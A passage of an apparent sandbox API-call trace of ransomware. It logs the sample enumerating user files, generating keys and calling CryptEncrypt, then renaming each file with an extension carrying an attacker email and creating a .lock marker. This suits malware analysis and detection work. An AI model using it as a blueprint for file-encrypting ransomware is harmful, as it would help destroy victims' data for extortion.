HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp" [0129.456] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.456] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4873) returned 1 [0129.456] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1309 [0129.457] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.457] GetProcessHeap () returned 0x410000 [0129.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.457] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.457] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.458] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.459] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1309) returned 0x4e1b68 [0129.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1309) returned 0x4e2e80 [0129.460] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.460] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x1309, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x1309, lpOverlapped=0x0) returned 1 [0129.461] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1309, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.461] CloseHandle (hObject=0x524) returned 1 [0129.462] GetProcessHeap () returned 0x410000 [0129.462] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.462] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y7vnpnpqshdg.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y7vnpnpqshdg.odp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.464] GetProcessHeap () returned 0x410000 [0129.464] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.464] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x72da2eb0, ftCreationTime.dwHighDateTime=0x1d5db6c, ftLastAccessTime.dwLowDateTime=0xcc6c55a0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xcc6c55a0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x5a24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_176HCAc0QQ6os.png", cAlternateFileName="_176HC~1.PNG")) returned 1 [0129.465] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_176hcac0qq6os.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.465] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.465] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5a24, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.465] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.465] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.466] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.466] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.466] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.466] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.466] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png", dwFileAttributes=0x80) returned 1 [0129.466] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png") returned 65 [0129.466] GetProcessHeap () returned 0x410000 [0129.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x431d68 [0129.466] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png" [0129.466] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.466] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=23076) returned 1 [0129.466] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5a24 [0129.466] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.466] GetProcessHeap () returned 0x410000 [0129.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.466] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.467] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.468] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.469] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5a24) returned 0x4e1b68 [0129.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5a24) returned 0xf70048 [0129.470] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.470] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x5a24, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x5a24, lpOverlapped=0x0) returned 1 [0129.473] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5a24, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.473] CloseHandle (hObject=0x524) returned 1 [0129.473] GetProcessHeap () returned 0x410000 [0129.473] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.473] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_176hcac0qq6os.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_176HCAc0QQ6os.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_176hcac0qq6os.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.476] GetProcessHeap () returned 0x410000 [0129.476] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.476] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x78419c00, ftCreationTime.dwHighDateTime=0x1d5de85, ftLastAccessTime.dwLowDateTime=0xb985cc40, ftLastAccessTime.dwHighDateTime=0x1d5df57, ftLastWriteTime.dwLowDateTime=0xb985cc40, ftLastWriteTime.dwHighDateTime=0x1d5df57, nFileSizeHigh=0x0, nFileSizeLow=0x753f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_aqB.bmp", cAlternateFileName="")) returned 1 [0129.476] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_aqb.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.477] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.477] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x753f, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.477] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.477] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.478] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.478] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.478] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.478] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.478] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp", dwFileAttributes=0x80) returned 1 [0129.478] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp") returned 55 [0129.478] GetProcessHeap () returned 0x410000 [0129.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x461440 [0129.478] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp" [0129.478] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.478] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=30015) returned 1 [0129.478] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x753f [0129.478] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.478] GetProcessHeap () returned 0x410000 [0129.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.478] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.479] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.481] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.482] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x753f) returned 0x4e1b68 [0129.483] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x753f) returned 0xf70048 [0129.483] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.483] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x753f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x753f, lpOverlapped=0x0) returned 1 [0129.486] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x753f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.486] CloseHandle (hObject=0x524) returned 1 [0129.486] GetProcessHeap () returned 0x410000 [0129.486] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.486] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_aqb.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_aqB.bmp.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_aqb.bmp.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.489] GetProcessHeap () returned 0x410000 [0129.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0129.489] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x78419c00, ftCreationTime.dwHighDateTime=0x1d5de85, ftLastAccessTime.dwLowDateTime=0xb985cc40, ftLastAccessTime.dwHighDateTime=0x1d5df57, ftLastWriteTime.dwLowDateTime=0xb985cc40, ftLastWriteTime.dwHighDateTime=0x1d5df57, nFileSizeHigh=0x0, nFileSizeLow=0x753f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_aqB.bmp", cAlternateFileName="")) returned 0 [0129.489] CloseHandle (hObject=0x3cc) returned 1 [0129.489] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.490] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x8, wMilliseconds=0x365)) [0129.490] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0129.490] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0129.490] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0129.490] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K9c354ca09c354b444c.lock") returned 72 [0129.490] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0129.493] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.494] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x4db120 [0129.494] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ffa7820, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0x516019b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x516019b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0e80 [0129.494] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ffa7820, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0x516019b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x516019b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.494] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2087000, ftCreationTime.dwHighDateTime=0x1d5d90c, ftLastAccessTime.dwLowDateTime=0x91d96f20, ftLastAccessTime.dwHighDateTime=0x1d5dacb, ftLastWriteTime.dwLowDateTime=0x91d96f20, ftLastWriteTime.dwHighDateTime=0x1d5dacb, nFileSizeHigh=0x0, nFileSizeLow=0x5f2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-AkN3KLFspX.jpg", cAlternateFileName="-AKN3K~1.JPG")) returned 1 [0129.494] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-akn3klfspx.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.494] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.494] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5f2c, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.494] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.495] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.495] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.495] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.495] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg", dwFileAttributes=0x80) returned 1 [0129.496] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg") returned 65 [0129.496] GetProcessHeap () returned 0x410000 [0129.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x431d68 [0129.496] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg" [0129.496] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.496] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=24364) returned 1 [0129.496] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5f2c [0129.496] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.496] GetProcessHeap () returned 0x410000 [0129.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.496] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.496] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: 